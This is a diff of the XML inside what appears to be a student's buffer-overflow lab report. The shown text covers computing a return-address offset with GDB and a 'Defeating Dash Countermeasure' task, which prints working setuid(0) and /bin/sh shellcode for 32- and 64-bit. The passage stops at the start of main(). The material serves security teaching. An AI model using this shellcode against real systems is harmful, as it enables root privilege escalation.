+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
         <w:drawing>
           <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="8">
             <wp:simplePos x="0" y="0"/>
@@ -3054,7 +3069,10 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:rPr/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
       </w:r>
     </w:p>
     <w:p>
@@ -3738,40 +3756,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">ret    = 0xffffcaa8 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>+ 13</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>6</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        # Change this number </w:t>
+        <w:t xml:space="preserve">ret    = 0xffffcaa8 + 136        # Change this number </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4031,6 +4016,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
           <w:sz w:val="30"/>
@@ -4123,8 +4112,1316 @@
         <w:ind w:end="0" w:hanging="0"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
-          <w:b w:val="false"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>The memory address used was from when I used GDB to find the length between the buffer and the ebp. The distance was 128 + 4 since it is a 32bit program which makes the offset for the return address to be 132. The new return address that would return to the malicious code was ebp + 136.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>Task 05: Defeating Dash Countermeasure</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>First and foremost, I set my shell back to dash.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="11">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>44450</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="736600"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="10" name="Image10" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="10" name="Image10" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="736600"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> then modified the call_shellcode.c file to call setuid(0) before the shell code runs. This is how the dash countermeasure can be defeated:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>#include &lt;stdlib.h&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>#include &lt;stdio.h&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>#include &lt;string.h&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">// Binary code for setuid(0) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>// 64-bit:  "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>// 32-bit:  "\x31\xdb\x31\xc0\xb0\xd5\xcd\x80"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>const char shellcode[] =</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>#if __x86_64__</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>"\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>"\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>#else</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>"\x31\xdb\x31\xc0\xb0\xd5\xcd\x80"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>"\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>"\xd2\x31\xc0\xb0\x0b\xcd\x80"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>#endif</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>int main(int argc, char **argv)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
